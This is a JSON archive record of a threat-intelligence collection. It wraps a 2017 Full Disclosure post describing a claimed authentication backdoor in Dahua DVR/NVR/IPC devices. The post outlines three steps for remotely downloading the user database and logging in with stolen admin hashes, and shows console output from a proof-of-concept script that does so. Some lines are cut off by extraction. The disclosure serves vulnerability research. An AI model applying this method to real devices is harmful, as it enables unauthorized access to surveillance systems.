{
	"id": "4c49aa56-b3e5-4c2c-a945-44c4ecc9515e",
	"created_at": "2026-04-06T00:09:46.86013Z",
	"updated_at": "2026-04-10T03:21:39.028543Z",
	"deleted_at": null,
	"sha1_hash": "b3bb51d2d1a12b0c312d23d5c5308cae35d49985",
	"title": "Dahua backdoor Generation 2 and 3",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 56858,
	"plain_text": "Dahua backdoor Generation 2 and 3\r\nBy bashis\r\nArchived: 2026-04-05 22:20:40 UTC\r\nFull Disclosure mailing list archives\r\nFrom: bashis \u003cmcw () noemail eu\u003e\r\nDate: Mon, 6 Mar 2017 07:13:21 +0000\r\n[STX]\r\nI'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have jus\r\nI have just discovered (to what I strongly believe is backdoor) in Dahua DVR/NVR/IPC and possible all\r\nSince I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the com\r\n(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing t\r\nIn short:\r\nYou can delete/add/change name on the admin users, you change password on the admin users - this back\r\ncare about that!\r\nIt uses whatever names and passwords you configuring - by simply downloading the full user database a\r\ncredentials!\r\nThis is so simple as:\r\n1. Remotely download the full user database with all credentials and permissions\r\n2. Choose whatever admin user, copy the login names and password hashes\r\n3. Use them as source to remotely login to the Dahua devices\r\nThis is like a damn Hollywood hack, click on one button and you are in...\r\nBelow PoC you will find here: [Dahua asked me to remove the PoC, will be re-posted April 5 2017 – To\r\nfor remediation]\r\nPlease have understanding of the quick hack of the PoC, I'm sure it could be done better.\r\nHave a nice day\r\n/bashis\r\nhttp://seclists.org/fulldisclosure/2017/Mar/7\r\nPage 1 of 3\n\n$ ./dahua-backdoor.py --rhost 192.168.5.2\r\n[*] [Dahua backdoor Generation 2 \u0026 3 (2017 bashis \u003cmcw noemail eu\u003e)]\r\n[i] Remote target IP: 192.168.5.2\r\n[i] Remote target PORT: 80\r\n[\u003e] Checking for backdoor version\r\n[\u003c] 200 OK\r\n[!] Generation 2 found\r\n[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM\r\n[\u003e] Requesting our session ID\r\n[\u003c] 200 OK\r\n[\u003e] Logging in\r\n[\u003c] 200 OK\r\n{ \"id\" : 10000, \"params\" : null, \"result\" : true, \"session\" : 100385023 }\r\n[\u003e] Logging out\r\n[\u003c] 200 OK\r\n[*] All done...\r\n$\r\n$ ./dahua-backdoor.py --rhost 192.168.5.3\r\n[*] [Dahua backdoor Generation 2 \u0026 3 (2017 bashis \u003cmcw noemail eu\u003e)]\r\n[i] Remote target IP: 192.168.5.3\r\n[i] Remote target PORT: 80\r\n[\u003e] Checking for backdoor version\r\n[\u003c] 200 OK\r\n[!] Generation 3 Found\r\n[i] Choosing Admin Login: admin, Auth: 27\r\n[\u003e] Requesting our session ID\r\n[\u003c] 200 OK\r\n[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074\r\n[i] Random value to encrypt with: 1958557123\r\n[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074\r\n[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E\r\n[\u003e] Logging in\r\n[\u003c] 200 OK\r\n{ \"id\" : 10000, \"params\" : null, \"result\" : true, \"session\" : 1175887285 }\r\n[\u003e] Logging out\r\n[\u003c] 200 OK\r\n[*] All done...\r\n$\r\nhttp://seclists.org/fulldisclosure/2017/Mar/7\r\nPage 2 of 3\n\n[ETX]\r\n_______________________________________________\r\nSent through the Full Disclosure mailing list\r\nhttps://nmap.org/mailman/listinfo/fulldisclosure\r\nWeb Archives \u0026 RSS: http://seclists.org/fulldisclosure/\r\nCurrent thread:\r\n0-Day: Dahua backdoor Generation 2 and 3 bashis (Mar 05)\r\nRe: 0-Day: Dahua backdoor Generation 2 and 3 Chris Holland (Mar 06)\r\n\u003cPossible follow-ups\u003e\r\nRe: 0-Day: Dahua backdoor Generation 2 and 3 bashis (Mar 07)\r\nRe: 0-Day: Dahua backdoor Generation 2 and 3 bashis (Mar 20)\r\nSource: http://seclists.org/fulldisclosure/2017/Mar/7\r\nhttp://seclists.org/fulldisclosure/2017/Mar/7\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://seclists.org/fulldisclosure/2017/Mar/7"
	],
	"report_names": [
		"7"
	],
	"threat_actors": [],
	"ts_created_at": 1775434186,
	"ts_updated_at": 1775791299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b3bb51d2d1a12b0c312d23d5c5308cae35d49985.pdf",
		"text": "https://archive.orkl.eu/b3bb51d2d1a12b0c312d23d5c5308cae35d49985.txt",
		"img": "https://archive.orkl.eu/b3bb51d2d1a12b0c312d23d5c5308cae35d49985.jpg"
	}
}